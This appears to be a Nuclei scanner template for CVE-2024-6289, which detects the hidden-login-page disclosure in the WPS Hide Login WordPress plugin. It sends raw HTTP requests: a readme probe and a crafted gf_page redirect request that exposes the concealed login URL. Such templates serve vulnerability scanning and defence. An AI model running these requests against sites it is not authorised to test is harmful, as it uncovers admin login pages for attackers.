id: CVE-2024-6289 info: name: WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure author: s4e-io severity: medium description: | The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page. impact: | Unauthenticated attackers can discover and access the hidden WordPress login page by exploiting improper redirect handling, defeating the security-by-obscurity measure. remediation: | Update WPS Hide Login plugin to version 1.9.16.4 or later to address the login page disclosure vulnerability. reference: - https://wpscan.com/vulnerability/fd6d0362-df1d-4416-b8b5-6e5d0ce84793/ - https://nvd.nist.gov/vuln/detail/CVE-2024-6289 - https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms/ classification: epss-score: 0.07883 epss-percentile: 0.92232 metadata: verified: true max-request: 1 vendor: wpserveur product: wps_hide_login framework: wordpress publicwww-query: "/wp-content/plugins/wps-hide-login/" tags: cve,cve2024,bypass,wp-plugin,wpscan,wordpress,wps-hide-login,vuln flow: http(1) && http(2) variables: string: "{{rand_text_alpha(10)}}" http: - raw: - | GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body,"WPS Hide Login")' - "status_code == 200" condition: and internal: true - raw: - | GET /?gf_page={{string}} HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - '!contains(tolower(location), "wp-login.php")' - 'contains(header,"%2F%3Fgf_page%3D{{string}}&reauth=1")' condition: and extractors: - type: kval kval: - location # digest: 4a0a00473045022100e93403d2bd0f6fe5d89a6ace2f940f959c7a3e3b7c90f34dfdddd85e062e96be02204e92728281f8530a3a3707ec76cc4f799aed5e52617b3897f1688f6bfc045c7d:922c64590222798bb761d5b6d8e72950